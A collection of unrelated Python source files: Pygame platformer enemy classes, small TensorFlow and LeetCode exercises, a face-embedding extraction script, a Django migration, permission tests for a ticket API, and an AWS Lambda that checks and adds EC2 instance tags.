        self.stamped_frame = enemy_dict['goomba_die'][color][0]
        self.image = self.stand_frames[0]
        super().__init_rect__(x, y)
        if self.face_right:
            self.x_vel = Goomba.speed_x_vel
        else:
            self.x_vel = - Goomba.speed_x_vel
        self.killmark = 100  # score awarded for killing this enemy
    wag_timer = 0  # seconds accumulated toward the next walk frame
    def update(self, d_sec):
        """Advance physics, walk animation, and corpse culling by d_sec seconds."""
        self.y_vel += self.y_acc * d_sec
        if self.dead:
            # Corpse lingers for goomba_die_timeout seconds, then is culled.
            if time.time() - self.die_time > goomba_die_timeout:
                self.killed = True
        else:
            self.wag_timer += d_sec
            if self.wag_timer > goomba_wag_epoch:
                self.wag_timer = 0
                self.frame = (self.frame + 1) % 2
                self.set_image(self.stand_frames[self.frame])
        # Keep the collision rect in sync with the current image.
        r = self.image.get_rect()
        self.rect.width = r.width
        self.rect.height = r.height
    def touch_x(self, item, is_right):
        # Horizontal collision: reverse direction and advance the walk frame.
        self.x_vel = - self.x_vel
        self.frame = (self.frame + 1) % 2
    def stamp(self, is_right):
        """Player landed on top: flatten in place and start the corpse timer."""
        self.die_time = time.time()
        self.dead = True
        self.x_vel = 0
        self.set_image(self.stamped_frame)
        self.fall()
    def go_die(self):
        """Killed outright (shell hit / jacked tile): flip upside down and launch up."""
        self.die_time = time.time()
        self.dead = True
        self.x_vel = 0
        self.y_vel = - jump_y_vel
        self.y_acc = gravity
        self.set_image(pygame.transform.flip(self.stand_frames[0], False, True))
        self.collide = False
# Width scale used in setup_res() to build the squeezed wobbling-shell frame.
shell_wag_w_scale = 0.8
# Koopa state-machine values: walking turtle, stamped shell, sliding shell.
st_koopa_turtle = 0
st_koopa_shell_static = 1
st_koopa_shell_run = 2
class Koopa(Enemy):
    """Turtle enemy with three states: walking turtle, stamped (static)
    shell, and kicked shell sliding along the ground."""
    def __init__(self, x, y, direction, color):
        super().__init__(direction)
        global enemy_dict
        # Sheet frames face left; mirror them to build the right-facing set.
        self.left_frames = enemy_dict['koopa'][color][2:]
        self.right_frames = []
        for im in self.left_frames:
            self.right_frames.append(pygame.transform.flip(im, True, False))
        self.shell_d_frames = enemy_dict['shell_d'][color]
        self.shell_frame = enemy_dict['shell'][color][0]
        if self.face_right:
            self.image = self.right_frames[0]
        else:
            self.image = self.left_frames[0]
        super().__init_rect__(x, y)
        if self.face_right:
            self.x_vel = Koopa.speed_x_vel
        else:
            self.x_vel = - Koopa.speed_x_vel
        self.state = st_koopa_turtle
        self.killmark = 200  # score awarded for killing this enemy
    wag_timer = 0  # seconds accumulated toward the next animation frame
    def update(self, d_sec):
        """Advance physics, state-dependent animation, and corpse culling."""
        self.y_vel += self.y_acc * d_sec
        self.wag_timer += d_sec
        if self.state == st_koopa_turtle:
            if self.wag_timer > koopa_wag_epoch:
                self.wag_timer = 0
                self.frame = (self.frame + 1) % 2
                if self.face_right:
                    self.set_image(self.right_frames[self.frame])
                else:
                    self.set_image(self.left_frames[self.frame])
        elif self.state == st_koopa_shell_static:
            self.set_image(self.shell_frame)
        elif self.state == st_koopa_shell_run:
            if self.wag_timer > shell_wag_epoch:
                # BUG FIX: was `wag_timer = 0`, a dead local assignment, so the
                # timer never reset and the shell animation toggled every single
                # frame instead of every shell_wag_epoch seconds (compare the
                # reset in Goomba.update).
                self.wag_timer = 0
                self.frame = (self.frame + 1) % 2
                self.set_image(self.shell_d_frames[self.frame])
        # Keep the collision rect in sync with the current image.
        r = self.image.get_rect()
        self.rect.width = r.width
        self.rect.height = r.height
        if self.dead:
            if time.time() - self.die_time > goomba_die_timeout:
                self.killed = True
    def touch_x(self, item, is_right):
        # Horizontal collision: reverse direction and advance the frame.
        self.x_vel = - self.x_vel
        self.face_right = not self.face_right
        self.frame = (self.frame + 1) % 2
    def stamp(self, is_right):
        """Stamped by the player: a static shell is kicked into a slide
        (away from the stamp side); anything else retracts into a shell."""
        if self.state == st_koopa_shell_static:
            self.state = st_koopa_shell_run
            if is_right:
                self.x_vel = Koopa.shell_speed_x_vel
            else:
                self.x_vel = - Koopa.shell_speed_x_vel
        else:
            self.state = st_koopa_shell_static
            self.x_vel = 0
        self.fall()
    def go_die(self):
        """Killed outright: retract into shell, launch upward, stop colliding."""
        self.die_time = time.time()
        self.dead = True
        self.x_vel = 0
        self.y_vel = - jump_y_vel
        self.y_acc = gravity
        self.state = st_koopa_shell_static
        self.collide = False
class FlyKoopa(Koopa):
    """Winged-Koopa placeholder — currently behaves exactly like Koopa."""
    def __init__(self, x, y, direction, color):
        super().__init__(x, y, direction, color)
        global enemy_dict
        # TODO: load wing frames / implement flying behavior.
        pass
class PipeFlower(Enemy):
    """Piranha-plant style enemy that rises out of a pipe, pauses, sinks back,
    and is clipped against the pipe mouth while moving."""
    def __init__(self, pipe, color=0, eat_frec_sec=0.34, stay_sec=2):
        super().__init__(0)
        self.frames = enemy_dict['pipeflower'][color]
        self.eat_frec_sec = eat_frec_sec  # seconds per chomp animation frame
        self.stay_sec = stay_sec  # pause duration at either end of travel
        self.full_image = self.image = im = self.frames[0]
        # Center the flower horizontally on the pipe mouth; start level with it.
        x, y = tools.center_top_pos(pipe.rect, (im.get_width(), im.get_height()))
        y = pipe.rect.y
        self.pipe = pipe
        super().__init_rect__(x, y)
        self.collide = False
        self.speed_y_vel = - PipeFlower.speed_y_vel  # negative => rising first
        self.y_vel = self.speed_y_vel
        self.x_vel = 0
        self.eat_timer = 0
        self.stay_timer = 0
        self.at_end = False
        self.killmark = 200  # score awarded for killing this enemy
    def update(self, d_sec):
        """Advance chomp animation, end-of-travel pauses, and pipe clipping."""
        self.eat_timer += d_sec
        if self.eat_timer > self.eat_frec_sec:
            self.eat_timer = 0
            self.frame = (self.frame+1) % 2
            self.full_image = self.frames[self.frame]
        # Reached the fully-out or fully-hidden position: stop and wait there.
        if not self.at_end and (self.rect.bottom <= self.pipe.rect.y + 1 or self.rect.y >= self.pipe.rect.y + 1):
            self.y_vel = 0
            self.stay_timer = 0
            self.speed_y_vel = -self.speed_y_vel  # reverse for the next leg
            self.at_end = True
        if self.at_end:
            self.stay_timer += d_sec
            if self.stay_timer > self.stay_sec:
                self.at_end = False
                self.stay_timer = 0
                self.y_vel = self.speed_y_vel
        # Only display the part of the sprite sticking out above the pipe.
        r1 = self.rect.to_int_rect()
        r2 = self.full_image.get_rect()
        r2.height -= max(0, r1.bottom - self.pipe.rect.y)
        r2.height = max(0, r2.height)
        self.set_image(self.full_image.subsurface(r2))
    def go_die(self):
        # Dies instantly; no corpse animation.
        self.killed = True
|
987,154 | e19e6b4ccde6f388c8c7a5288125e7360c62ee3f |
import tensorflow as tf
# TF1.x graph-mode demo: mark positions where the series jumps by more than 5
# relative to the previous sample, then checkpoint the boolean variable.
ts = tf.InteractiveSession()
d = [1, 2, 8, -1, 0, 5.5, 6, 13]
spikes = tf.Variable([False] * len(d), name='spikes')
spikes.initializer.run()
saver = tf.train.Saver()
# NOTE(review): tf.assign inside the loop adds a new op to the graph on every
# iteration — works for this toy size, but grows the graph unboundedly.
for i in range(1, len(d)):
    if d[i] - d[i-1] > 5:
        spikes_val = spikes.eval()
        spikes_val[i] = True
        updater = tf.assign(spikes, spikes_val)
        updater.eval()
save_path = saver.save(ts, "/home/fyliu/spikes.ckpt")
print("spikes data saved in file: %s" % save_path)
ts.close()
|
class Monkey:
    """Toy demo of a name-mangled class attribute shared by all instances."""
    # Communal banana supply; decremented by every monkey's bite.
    __no_of_bananas = 40
    def eat_banana(self):
        """Print the action and take one banana from the shared supply."""
        print("eating banana")
        Monkey.__no_of_bananas -= 1
    @staticmethod
    def get_banana_count():
        """Report how many bananas remain in the shared supply."""
        print("No. of bananas left: ", Monkey.__no_of_bananas)
# Demo: two monkeys each eat one banana from the shared supply (40 -> 38).
gopher=Monkey()
doodoo=Monkey()
gopher.eat_banana()
doodoo.eat_banana()
Monkey.get_banana_count()
987,156 | f94216dc4b7b2555e91a1f3d4ca81667d143b9e5 | # Given an array of intervals where intervals[i] = [starti, endi], merge all overlapping intervals, and return an array of the non-overlapping intervals that cover all the intervals in the input.
# Example 1:
# Input: intervals = [[1,3],[2,6],[8,10],[15,18]]
# Output: [[1,6],[8,10],[15,18]]
# Explanation: Since intervals [1,3] and [2,6] overlaps, merge them into [1,6].
# Example 2:
# Input: intervals = [[1,4],[4,5]]
# Output: [[1,5]]
# Explanation: Intervals [1,4] and [4,5] are considered overlapping.
# Constraints:
# 1 <= intervals.length <= 10**4
# intervals[i].length == 2
# 0 <= starti <= endi <= 10**4
from typing import List
class Solution:
    def merge(self, intervals: List[List[int]]) -> List[List[int]]:
        """Merge overlapping [start, end] intervals (LeetCode 56).

        Sorts by start, then folds each interval into the result: an
        interval either extends the last merged group (touching endpoints
        count as overlap) or begins a new one.  O(n log n) time.  The input
        list is sorted in place, matching the original implementation.
        """
        if len(intervals) <= 1:
            return intervals if intervals else []
        intervals.sort(key=lambda iv: iv[0])
        merged = [list(intervals[0])]
        for start, end in intervals[1:]:
            last = merged[-1]
            if start <= last[1]:
                # Overlaps (or touches) the previous group: widen it.
                last[1] = max(last[1], end)
            else:
                merged.append([start, end])
        return merged
# Smoke tests: the two LeetCode 56 examples plus edge cases (single interval,
# disjoint pairs, unsorted input, and heavy duplication).
intervals = [[1,3],[2,6],[8,10],[15,18]]
exp = [[1, 6], [8, 10], [15, 18]]
# print(Solution().merge(intervals))
assert Solution().merge(intervals) == exp
intervals = [[1,4],[5,6]]
exp = [[1, 4], [5, 6]]
print(Solution().merge(intervals))
assert Solution().merge(intervals) == exp
intervals = [[1,3]]
exp= [[1, 3]]
print(Solution().merge(intervals))
assert Solution().merge(intervals) == exp
intervals = [[1,4],[0,0]]
exp = [[0,0],[1,4]]
print(Solution().merge(intervals))
assert Solution().merge(intervals) == exp
intervals = [[1,4],[0,2],[3,5]]
exp = [[0,5]]
print(Solution().merge(intervals))
assert Solution().merge(intervals) == exp
intervals = [[0,0],[1,2],[5,5],[2,4],[3,3],[5,6],[5,6],[4,6],[0,0],[1,2],[0,2],[4,5]]
exp = [[0,6]]
print(Solution().merge(intervals))
assert Solution().merge(intervals) == exp
|
987,157 | 4b8e230a6a1284c2925ed5f25337bbb1d52f19cb | A, B, C = input().split()
# Convert the three side lengths read by the input() line above.
A = float(A)
B = float(B)
C = float(C)
# The sides form a valid triangle exactly when each is strictly less than the
# sum of the other two; the original's extra abs() comparisons are implied by
# these three checks, so the complement condition below is equivalent.
if A < B + C and B < A + C and C < A + B:
    perimetro = A + B + C
    print("Perimetro = %.1f" % perimetro)
else:
    # Not a triangle: report the area of the trapezoid with bases A, B and height C.
    area = (A + B) * C / 2
    print("Area = %.1f" % area)
|
987,158 | a87fb0174a71d3aa1d5146add65cdc9509d3b6e8 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import lz
from lz import *
import os
from datetime import datetime
import os.path
from easydict import EasyDict as edict
import time
import json
import sys
import numpy as np
import importlib
import itertools
import argparse
import struct
import cv2
import sklearn
from sklearn.preprocessing import normalize
import mxnet as mx
from mxnet import ndarray as nd
import lmdb, six
from PIL import Image
# Pin the GPUs this script is allowed to use (via the lz helper).
lz.init_dev((0, 1, 2, 3))
image_shape = (3, 112, 112)  # CHW; overwritten from --image_size in main()
net = None  # lazily initialised model wrapper (mxnet Module or FaceInfer)
data_size = 1862120  # number of images expected in filelist.txt
emb_size = 0  # embedding dimension; discovered from the first batch
use_flip = True  # average the embedding of each image with its mirror
use_mxnet = False  # False -> use the PyTorch FaceInfer path
env = None  # lmdb environment holding the images (set in main)
glargs = None  # parsed CLI args, stored globally for get_feature()
xrange = range  # py2-style alias used throughout this script
def do_flip(data):
    """Mirror a CHW image horizontally, in place.

    Vectorized equivalent of applying np.fliplr to every 2-D channel slice.
    """
    # .copy() guarantees the overlapping self-assignment is safe.
    data[:, :, :] = data[:, :, ::-1].copy()
def get_feature(buffer):
    """Compute L2-normalised embeddings for a batch of image paths.

    Images come from disk (cv2) or, when the module-level `env` is set,
    from lmdb.  With `use_flip` each image and its horizontal mirror are
    both embedded and their embeddings averaged.
    """
    global emb_size
    if use_flip:
        input_blob = np.zeros((len(buffer) * 2, 3, image_shape[1], image_shape[2]))
    else:
        input_blob = np.zeros((len(buffer), 3, image_shape[1], image_shape[2]))
    idx = 0
    for item in buffer:
        if env is None:
            img = cv2.imread(item)[:, :, ::-1]  # to rgb
        else:
            # lmdb keys are paths relative to the input root.
            item = item.replace(glargs.input, '')
            with env.begin(write=False) as txn:
                imgbuf = txn.get(str(item).encode())
            buf = six.BytesIO()
            buf.write(imgbuf)
            buf.seek(0)
            f = Image.open(buf)
            img = f.convert('RGB')
            img = np.asarray(img)
        img = np.transpose(img, (2, 0, 1))  # HWC -> CHW
        attempts = [0, 1] if use_flip else [0]
        for flipid in attempts:
            _img = np.copy(img)
            if flipid == 1:
                do_flip(_img)
            input_blob[idx] = _img
            idx += 1
    input_blob = input_blob.astype('float32')
    if use_mxnet:
        data = mx.nd.array(input_blob)
        db = mx.io.DataBatch(data=(data,))
        net.model.forward(db, is_train=False)
        _embedding = net.model.get_outputs()[0].asnumpy()
    else:
        # PyTorch path: scale pixels to [-1, 1] before the forward pass.
        data = input_blob - 127.5
        data /= 127.5
        data = to_torch(data)
        with torch.no_grad():
            _embedding = net.model(data).cpu().numpy()
    if emb_size == 0:
        # First batch: record the embedding dimension for main()'s allocation.
        emb_size = _embedding.shape[1]
        print('set emb_size to ', emb_size)
    if use_flip:
        # Even rows are originals, odd rows their mirrors; average each pair.
        embedding1 = _embedding[0::2]
        embedding2 = _embedding[1::2]
        embedding = embedding1 + embedding2
        embedding /= 2
    else:
        embedding = _embedding
    embedding = sklearn.preprocessing.normalize(embedding)  # todo
    # print('norm ', np.linalg.norm(embedding, axis=1))
    return embedding
def write_bin(path, m):
    """Serialise a 2-D float32 matrix to the packed binary feature format.

    Layout: a 16-byte header of four little-endian-native ints
    (rows, cols, row stride in bytes, format code 5) followed by the raw
    matrix bytes.
    """
    rows, cols = m.shape
    header = struct.pack('4i', rows, cols, cols * 4, 5)
    with open(path, 'wb') as out:
        out.write(header)
        out.write(m.data)
def main(args):
    """Embed every image listed in <input>/filelist.txt and dump all
    features to a packed binary file (see write_bin)."""
    global image_shape, net, env, glargs
    print(args)
    glargs = args
    env = lmdb.open(args.input + '/imgs_lmdb', readonly=True,
                    # max_readers=1, lock=False,
                    # readahead=False, meminit=False
                    )
    # One mx context per visible GPU; fall back to CPU when none are visible.
    ctx = []
    cvd = os.environ['CUDA_VISIBLE_DEVICES'].strip()
    if len(cvd) > 0:
        for i in xrange(len(cvd.split(','))):
            ctx.append(mx.gpu(i))
    if len(ctx) == 0:
        ctx = [mx.cpu()]
        print('use cpu')
    else:
        print('gpu num:', len(ctx))
    image_shape = [int(x) for x in args.image_size.split(',')]
    if use_mxnet:
        # mxnet path: args.model is a "prefix,epoch" checkpoint reference.
        net = edict()
        vec = args.model.split(',')
        assert len(vec) > 1
        prefix = vec[0]
        epoch = int(vec[1])
        print('loading', prefix, epoch)
        net.ctx = ctx
        net.sym, net.arg_params, net.aux_params = mx.model.load_checkpoint(prefix, epoch)
        # net.arg_params, net.aux_params = ch_dev(net.arg_params, net.aux_params, net.ctx)
        all_layers = net.sym.get_internals()
        net.sym = all_layers['fc1_output']
        net.model = mx.mod.Module(symbol=net.sym, context=net.ctx, label_names=None)
        net.model.bind(data_shapes=[('data', (args.batch_size, 3, image_shape[1], image_shape[2]))])
        net.model.set_params(net.arg_params, net.aux_params)
    else:
        # PyTorch path: build a FaceInfer from the project config.
        # sys.path.insert(0, lz.home_path + 'prj/InsightFace_Pytorch/')
        from config import conf
        from Learner import FaceInfer
        conf.need_log = False
        conf.batch_size = args.batch_size
        conf.fp16 = True
        conf.ipabn = False
        conf.cvt_ipabn = False
        conf.use_chkpnt = False
        net = FaceInfer(conf, gpuid=range(conf.num_devs))
        net.load_state(
            resume_path=args.model,
            latest=False,
        )
        net.model.eval()
    features_all = None
    i = 0
    fstart = 0
    buffer = []
    for line in open(os.path.join(args.input, 'filelist.txt'), 'r'):
        if i % 1000 == 0:
            print("processing ", i, data_size, 1. * i / data_size)
        i += 1
        line = line.strip()
        image_path = os.path.join(args.input, line)
        buffer.append(image_path)
        if len(buffer) == args.batch_size:
            embedding = get_feature(buffer)
            buffer = []
            fend = fstart + embedding.shape[0]
            if features_all is None:
                # Allocate the full output matrix once emb_size is known.
                features_all = np.zeros((data_size, emb_size), dtype=np.float32)
            # print('writing', fstart, fend)
            features_all[fstart:fend, :] = embedding
            fstart = fend
    if len(buffer) > 0:
        # Flush the final partial batch.
        embedding = get_feature(buffer)
        fend = fstart + embedding.shape[0]
        print('writing', fstart, fend)
        features_all[fstart:fend, :] = embedding
    write_bin(args.output, features_all)
    # os.system("bypy upload %s"%args.output)
def parse_arguments(argv):
    """Build the CLI parser; set_defaults() hard-codes the current run's paths."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--batch_size', type=int, help='', default=160 * 4)
    parser.add_argument('--image_size', type=str, help='', default='3,112,112')
    parser.add_argument('--input', type=str, help='', default='')
    parser.add_argument('--output', type=str, help='', default='')
    parser.add_argument('--model', type=str, help='', default='')
    # These defaults override the per-argument ones above for this experiment.
    parser.set_defaults(
        input='/data/share/iccv19.lwface/iccv19-challenge-data/',
        # output=lz.work_path + 'mbfc.retina.cl.arc.cotch.bin',
        output=lz.work_path + 'mbfc.cotch.mual.1e-3.bin',
        # model=lz.root_path + '../insightface/logs/r50-arcface-retina/model,16',
        # model=lz.root_path + 'work_space/mbfc.retina.cl.arc.cotch.cont/models',
        model=lz.root_path + 'work_space/mbfc.cotch.mual.1e-3.cont/models',
    )
    return parser.parse_args(argv)
# Script entry point: parse CLI args and run the extraction pipeline.
if __name__ == '__main__':
    main(parse_arguments(sys.argv[1:]))
|
987,159 | cd401f4697093b008fd5bc978b31f166a4024755 | # Generated by Django 2.1.4 on 2018-12-21 13:43
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated: reorder IP by -m_time, rename its verbose names, and
    drop the obsolete `c_time` and `tags` fields."""
    dependencies = [
        ('assets', '0006_auto_20181220_1657'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='ip',
            options={'ordering': ['-m_time'], 'verbose_name': 'IP表', 'verbose_name_plural': 'IP表'},
        ),
        migrations.RemoveField(
            model_name='ip',
            name='c_time',
        ),
        migrations.RemoveField(
            model_name='ip',
            name='tags',
        ),
    ]
987,160 | 33187f82d9aa156d6044c25416bca7bd90d2acc9 | from .serializer_manager import SerializerManager
# Public API of this package: re-export SerializerManager only.
__all__ = ('SerializerManager',)
|
987,161 | 557c8bec89dc33104fe24de213511ba92a62d14c | from rebase.common.utils import ids, RebaseResource
from rebase.tests.common.ticket import (
case_github_contractor,
case_github_mgr,
case_github_admin,
case_github_admin_collection,
case_github_anonymous,
case_github_anonymous_collection,
)
from . import PermissionTestCase
from .ticket import BaseTestTicketResource
class TestGithubTicket(PermissionTestCase):
    """Permission matrix for the GithubTicket resource: contractor, manager,
    admin and anonymous roles against collection/view/modify/delete/create."""
    model = 'GithubTicket'
    def new(self, github_ticket):
        """Creation payload modelled on `github_ticket` (next number up)."""
        return {
            'project': ids(github_ticket.project),
            'number': github_ticket.number+1
        }
    def update(_, ticket):
        """Modification payload that appends to title and description."""
        # NOTE(review): first parameter is named `_` rather than `self`,
        # inconsistent with the sibling methods.
        updated_ticket = ids(ticket)
        updated_ticket.update(
            title=ticket.title+' yo mama',
            description=ticket.description+'yo mama'
        )
        return updated_ticket
    def validate_view(self, github_ticket):
        """Assert a serialized ticket exposes id/title/number/description."""
        self.assertTrue(github_ticket)
        self.assertIn('id', github_ticket)
        self.assertIsInstance(github_ticket['id'], int)
        self.assertIn('title', github_ticket)
        self.assertIsInstance(github_ticket['title'], str)
        self.assertIn('number', github_ticket)
        self.assertIsInstance(github_ticket['number'], int)
        self.assertIn('description', github_ticket)
        self.assertIsInstance(github_ticket['description'], str)
    # --- contractor: read-only access ---
    def test_contractor_collection(self):
        self.collection(case_github_contractor, 'contractor')
    def test_contractor_view(self):
        self.view(case_github_contractor, 'contractor', True)
    def test_contractor_modify(self):
        self.modify(case_github_contractor, 'contractor', False)
    def test_contractor_delete(self):
        self.delete(case_github_contractor, 'contractor', False)
    def test_contractor_create(self):
        self.create(case_github_contractor, 'contractor', False)
    # --- manager: full access ---
    def test_mgr_collection(self):
        self.collection(case_github_mgr, 'manager')
    def test_mgr_view(self):
        self.view(case_github_mgr, 'manager', True)
    def test_mgr_modify(self):
        self.modify(case_github_mgr, 'manager', True)
    def test_mgr_delete(self):
        self.delete(case_github_mgr, 'manager', True)
    def test_mgr_create(self):
        self.create(case_github_mgr, 'manager', True)
    # --- admin (exercised through the manager role): full access ---
    def test_admin_collection(self):
        self.collection(case_github_admin_collection, 'manager')
    def test_admin_view(self):
        self.view(case_github_admin, 'manager', True)
    def test_admin_modify(self):
        self.modify(case_github_admin, 'manager', True)
    def test_admin_delete(self):
        self.delete(case_github_admin, 'manager', True)
    def test_admin_create(self):
        self.create(case_github_admin, 'manager', True)
    # --- anonymous: no access beyond the collection endpoint ---
    def test_anonymous_collection(self):
        self.collection(case_github_anonymous_collection, 'manager')
    def test_anonymous_view(self):
        self.view(case_github_anonymous, 'manager', False)
    def test_anonymous_modify(self):
        self.modify(case_github_anonymous, 'manager', False)
    def test_anonymous_delete(self):
        self.delete(case_github_anonymous, 'manager', False)
    def test_anonymous_create(self):
        self.create(case_github_anonymous, 'manager', False)
|
987,162 | 6bc85d00444e8465ba18dd45617ba15d243a25a5 | import json, boto3, datetime, os, base64, ast, sys
from botocore.exceptions import ClientError
# global variables used for email and slack
URL = os.environ.get("sqs_url")  # SQS queue receiving instance-launch events
SENDER_EMAIL = os.environ.get("sender_email")  # From: address for notifications
APP_URL = os.environ.get("slack_application_url")  # Slack application endpoint
CHANNEL = os.environ.get("slack_channel")
CHANNEL_ID = os.environ.get("slack_channel_id")
# Run mode ('audit' or 'enforce'); populated by lambda_handler from $mode.
MODE = ""
def lambda_handler(event, context):
    """
    # Handler that triggers upon an event hooked up to Lambda
    Drains the SQS queue of instance-launch events, checks/repairs tags on
    each launched instance, deletes fully handled messages, and notifies
    owners about missing owner tags or invalid patch tags.
    :param event: event data in the form of a dict
    :param context: runtime information of type LambdaContext
    :return: codes indicating success or failure
    """
    # BUG FIX: declare MODE global — without this the assignment created a
    # local and checkTags() kept seeing the module-level "", so 'enforce'
    # mode never took effect.
    global MODE
    MODE = os.environ.get('mode')
    if not MODE:
        MODE = 'audit'
    print("Operating in " + MODE + " mode")
    sqs_client = boto3.client('sqs')
    # keep looping until no more messages
    missingOwners = {}   # nt_id -> instance ids missing owner tags
    missingPatches = {}  # nt_id -> instance ids with invalid patch tags
    while True:
        sqs_response = sqs_client.receive_message(
            QueueUrl = URL,
            AttributeNames=['ApproximateNumberOfMessages'],
            MaxNumberOfMessages= 10,
            MessageAttributeNames=['instance-launch-info']
        )
        if 'Messages' in sqs_response:
            for message in sqs_response['Messages']:
                # BUG FIX: start at True and AND in each instance's result.
                # Initialising to False made `canDelete and instValid` stay
                # False forever, so messages with instances were never
                # deleted from the queue.
                canDelete = True
                instance_detail = json.loads(message['Body'])['detail']
                nt_id = instance_detail['userIdentity']['principalId'].split(':')[1]
                if instance_detail['responseElements'] != None:
                    instances = instance_detail['responseElements']['instancesSet']['items']
                    for instance in instances:
                        instance_id = instance['instanceId']
                        ec2client = boto3.client("ec2")
                        response = ec2client.describe_instances(InstanceIds=[instance_id])
                        if response["Reservations"] and response["Reservations"][0]["Instances"]:
                            instValid, item1, item2 = checkTags(instance_id,
                                response["Reservations"][0]['Instances'][0]['Tags'], nt_id,)
                            # Record per-user lists of problem instances.
                            if item1:
                                missingOwners.setdefault(nt_id, []).append(item1)
                            if item2:
                                missingPatches.setdefault(nt_id, []).append(item2)
                            canDelete = canDelete and instValid
                if canDelete:
                    sqs_client.delete_message(
                        QueueUrl= URL,
                        ReceiptHandle= message['ReceiptHandle']
                    )
                    print("Deleted queue message")
        else:
            print("No more messages found in the queue")
            break
    for user in missingOwners:
        notify(user, str(missingOwners[user]), "is missing Owning_Mail or Owning_Team tags",
               "Please add these tags to your resources.", "Missing Owner Tags", "Alert: Missing Owner tags!")
    for user in missingPatches:
        notify(user, str(missingPatches[user]), "has an invalid Patch Group tag. These resources will receive the latest patches",
               "If you do not need the latest patches, please fix these tags", "Invalid Patch Tags", "Error: Invalid patch tags!")
    return {
        "statusCode": 200,
        "body": json.dumps('Tagged resources')
    }
def checkTags(instance_id, tagSet, nt_id):
    """
    # Checks for tags and adds them if they are not present
    :param instance_id: EC2 instance id being inspected
    :param tagSet: list of {'Key': ..., 'Value': ...} dicts on the instance
    :param nt_id: NT id of the user who launched the instance
    :return: (valid, missing_owner_instance_id, invalid_patch_instance_id);
             the last two are '' when nothing is wrong
    """
    tags = []
    missingOwnersItem = ""
    missingPatchesItem = ""
    patch_name = ""
    isPatchTag = False
    isExpiration = False
    isCreatorID = False
    isOwnerMailTag = False
    isOwnerTeamTag = False
    for tag in tagSet:
        if tag['Key'] == 'Expiration':
            isExpiration = True
        if tag['Key'] == 'Creator ID':
            isCreatorID = True
        if tag['Key'] == 'Patch Group':
            isPatchTag = checkPatchValidity(tag['Value'])
        if tag['Key'] == 'Owning_Mail':
            isOwnerMailTag = True
        if tag['Key'] == 'Owning_Team':
            isOwnerTeamTag = True
    if not isExpiration:
        # Default lifetime: 30 days from today.
        tags.append(
            {
                'Key': 'Expiration',
                'Value': (datetime.date.today() + datetime.timedelta(days = 30)).strftime('%Y-%m-%d')
            })
    if not isCreatorID:
        tags.append(
            {
                'Key': 'Creator ID',
                'Value': nt_id
            })
    if not isOwnerTeamTag or not isOwnerMailTag:
        missingOwnersItem = instance_id
    if not isPatchTag:
        print("invalid patch tags!")
        missingPatchesItem = instance_id
        patch_name = createPatchTag(tags, instance_id, nt_id)
        # BUG FIX: create_tags requires {'Key': ..., 'Value': ...} dicts;
        # the previous {'Patch Group': patch_name} shape would be rejected.
        tags.append({'Key': 'Patch Group', 'Value': patch_name})
    print("Attaching tags: " + str(tags) + " to instance " + instance_id)
    if MODE == 'enforce':
        attachInstanceTags(instance_id, tags)
    # BUG FIX: always return the same 3-tuple shape.  The success path used
    # to return a bare True, which made the caller's 3-way unpack raise
    # TypeError as soon as an instance was fully valid.
    if MODE == "enforce" and patch_name != "Not yet populated" and isOwnerMailTag and isOwnerTeamTag:
        return True, missingOwnersItem, missingPatchesItem
    return False, missingOwnersItem, missingPatchesItem
def checkPatchValidity(val):
    """
    # checks if the PatchGroup tag is valid
    A valid tag has at least five '-'-separated fields, each occurring
    (substring match) inside the matching environment variable's
    allowed-values string.
    :param val: the tag to evaluate
    :return: boolean if valid or not
    """
    fields = val.split('-')
    if len(fields) < 5:
        return False
    expected_keys = ('environment', 'platform', 'role', 'urgency', 'order')
    for field, env_key in zip(fields, expected_keys):
        if field not in os.environ.get(env_key):
            return False
    return True
def createPatchTag(tags, instance_id, nt_id):
    """
    # creates a patch tag based on platform, filler if platform not found
    :param tags: the list of tags to add to a resource
    :param instance_id: the id of the resource
    :param nt_id: the nt_id owner of a resource
    :return: The tag value
    """
    # NOTE(review): `tags` and `nt_id` are never referenced in this body.
    client = boto3.client('ssm')
    # Ask SSM what platform the instance reports (requires the SSM agent).
    response = client.describe_instance_information(
        InstanceInformationFilterList=[
            {
                'key': 'InstanceIds',
                'valueSet': [instance_id]
            }
        ]
    )
    patch_tag_value = ''
    platform_name = ''
    if (response['InstanceInformationList']):
        platform_name = response['InstanceInformationList'][0]['PlatformName']
    # Map the reported platform name onto a default patch group; ordering
    # matters ('Amazon Linux 2' must be tested before 'Amazon Linux').
    if 'Red Hat Enterprise Linux' in platform_name:
        patch_tag_value = 'default-rhel'
    elif 'Windows' in platform_name:
        patch_tag_value = 'default-windows'
    elif 'Ubuntu' in platform_name:
        patch_tag_value = 'default-ubuntu'
    elif 'Centos' in platform_name:
        patch_tag_value = 'default-centos'
    elif 'Amazon Linux 2' in platform_name:
        patch_tag_value = 'default-amazon2'
    elif 'Amazon Linux' in platform_name:
        patch_tag_value = 'default-amazon'
    else:
        # Unknown platform (or no SSM info): placeholder that callers treat
        # as "not yet valid".
        print("No patch group found for platform")
        patch_tag_value = 'Not yet populated'
    return patch_tag_value
def attachInstanceTags(instance_id, tags):
    """
    # attaches a list of tags to a resource
    :param instance_id: the id of the resource
    :param tags: list of tags to add
    :return: boolean value to indicate if the instance exists or not, true if not found!
    """
    # NOTE(review): despite the docstring, nothing is returned; `empty` only
    # gates the notify_snitch audit call below.
    empty = False
    lambda_client = boto3.client('lambda')
    data = {
        'comp_name': "attachInstanceTags",
        'action': "attach tags",
        'level': "info",
        'msg': "attached " + str(tags) + " to instance " + instance_id
    }
    try:
        client = boto3.client('ec2')
        response = client.create_tags(
            Resources=[instance_id],
            Tags= tags
        )
        print("Attached tags to instance")
    except ClientError as e:
        if e.response['Error']['Code'] == 'InvalidInstanceID.NotFound':
            print("No such instance exists")
            empty = True
        else:
            # Other failures are logged but still audited below.
            print("Error attaching tags to instance: " + str(e))
    if (not empty):
        # Audit-log the tagging attempt via the notify_snitch lambda.
        invoke_response = lambda_client.invoke(
            FunctionName= os.environ.get("notify_snitch"),
            InvocationType= "RequestResponse",
            Payload= json.dumps(data)
        )
def create_messages(application, action, remedy):
    """
    # Creates a preformatted message depending on expiration
    :param application: name of the application
    :param action: What is being done to the application
    :param remedy: steps to take
    :return: String containing the message
    """
    # Index 0 is the HTML email body, index 1 the plain-text variant used
    # for both the email fallback and the Slack message.
    messages = []
